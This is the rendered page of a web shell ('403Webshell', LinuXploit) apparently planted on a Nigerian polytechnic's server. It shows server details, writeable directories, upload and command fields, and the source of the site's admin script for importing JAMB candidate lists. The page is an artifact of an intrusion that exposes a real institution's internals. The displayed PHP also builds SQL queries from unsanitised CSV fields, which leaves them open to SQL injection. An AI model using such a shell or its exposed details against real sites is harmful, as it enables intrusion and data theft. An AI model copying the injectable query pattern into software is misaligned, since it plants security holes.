403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.50.62
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_main/jamb_list_process.php
<?php
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 3/2/2016
 * Time: 3:18 PM
 */
include('headMain_ord.php');

?>
                    <script src="../SpryAssets/SpryMenuBar.js" type="text/javascript"></script>

                    <script type="text/javascript" language="javascript" src="../js/jquery-1.7.1.js"></script>
                    <script type="text/javascript" language="javascript" src="../js/scriptFileLong.js"></script>

    <div class="row">
        <div class="col-lg-1"></div>
        <div class="col-lg-8">
            <div class="panel panel-default">
                <div class="panel-heading">
                   Uploading JAMB List
                </div>
                <div class="panel-body">

                    <div class="row">
                        <div class="col-lg-12">

                            <?php
if(isset($_POST["submit"])) {
    $file = $_FILES['file']['tmp_name'];
    $handle = fopen($file, "r");
    $c = 0;
    $counter=0;
    $db->query("DELETE from jambrelease where id>0");
    while (($filesop = fgetcsv($handle, 100000000, ",")) !== false) {

      /*  $id = $filesop[0];
        $deptId = $filesop[1];
        $jambNo = $filesop[2];
        $fullName = $filesop[3];
        $fullName = str_replace("'", "''", $fullName);
        $state = $filesop[4];
        $lga = $filesop[5];
        $sex = $filesop[6];
        $age = strtoupper($filesop[7]);
        $eng = $filesop[8];
        $sub2 = $filesop[9];
        $sub2Score = $filesop[10];
        $sub3 = $filesop[11];
        $sub3Score = $filesop[12];
        $sub4 = $filesop[13];
        $sub4Score = $filesop[14];
        $totalScore = $filesop[15];
        $choiceID = 0;
        $school = 0;
        $dept = $filesop[16];
        $courseId = $filesop[17];*/
        /* $matNo = $filesop[0];
         $names = $filesop[1];*/


        $jambNo = $filesop[0];
        $fullName = $filesop[1];
        $sex = $filesop[2];
        $fullName = str_replace("'", "''", $fullName);
        $state = $filesop[3];
        $totalScore = $filesop[4];
        $dept = $filesop[5];
        $lga = $filesop[6];
        $sub2 = $filesop[7];
        $sub2Score = $filesop[8];
        $sub3 = $filesop[9];
        $sub3Score = $filesop[10];
        $sub4 = $filesop[11];
        $sub4Score = $filesop[12];
        $eng = $filesop[13];

//die();

        $check_data = $db->query("select * from jambrelease where jambNo='$jambNo'");
        $check_num = $check_data->rowCount();
        $dataNow = $check_data->fetch(PDO::FETCH_BOTH);

        if ($check_num > 0) {
            echo 'Already Exist=> Jamb No: ' . $jambNo . '=>Full Name: ' . $fullName . '<br>';
            echo 'Present Record=> Jamb No: ' . $dataNow['jambNo'] . '=>Full Name: ' . $dataNow['candName'] . '<br>';
        } else {


//$sql=$db->query("INSERT INTO `fedpoly`.`jambregu` (`sn`, `matNo`, `names`, `dateSent`) VALUES (NULL, '$matNo', '$names', 'datestamp')");
            // $sql = mysql_query("INSERT INTO `fedpoly`.`admitted` (`sn`, `formNo`, `jambNo`, `names`, `course`, `levelID`, `mode`, `state`, `lga`, `address`, `dob`, `email`, `gsm`, `sex`, `batch`, `acceptance`, `datepay`) VALUES (NULL, '$formNo', '$jambNo', '$fullName', '$dept', '$level', '$mode', '0', '0', '0', '0', '0', '0', '0', '4', '0', CURRENT_TIMESTAMP)");

          echo   $sql_query="INSERT INTO `jambrelease` (`id`, `deptSn`, `candName`, `state`, `lga`, `sex`, `age`, `eng`, `sub2`, `sub2Score`, `sub3`, `sub3Score`, `sub4`, `sub4Score`, `totalScore`, `choiceNo`, `faculty`, `dept`, `courseID`, `jambNo`, `dateIn`, `utmeScore`, `aggregate`, `formNo`, `gsm`, `batch`)
VALUES (NULL, '0', '$fullName', '$state', '$lga', '$sex', '0', '$eng', '$sub2', '$sub2Score', '$sub3', '$sub3Score', '$sub4', '$sub4Score', '$totalScore', '0', '0', '$dept', '0','$jambNo', CURRENT_TIMESTAMP, '0', '0', '0', '0', '0')";
//            $sql_query = "INSERT INTO `fedpoly`.`jambrelease`(`candName`, `state`, `lga`, `sex`, `totalScore`, `dept`,`jambNo`)VALUES('$fullName','$state', '$lga','$sex','$totalScore','$dept','$jambNo')";
            $sql = $db->query($sql_query);
//$sql = mysql_query("INSERT INTO `fedpoly`.`nooo` (`formNo`, `course`, `names`) VALUES ('$formNo', '$dept', '$fullName')");
$counter+=1;

        }
    }
    echo $counter;
        if ($sql) {
            echo $counter. " Record Inserted Successfully";

        } else {
            echo "Sorry! There is some problem.";
        }
    }

                            ?>
                            </div>
                            </div>
                            </div>
                </div>
            </div>
        </div>

        <?php
include('footMain.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit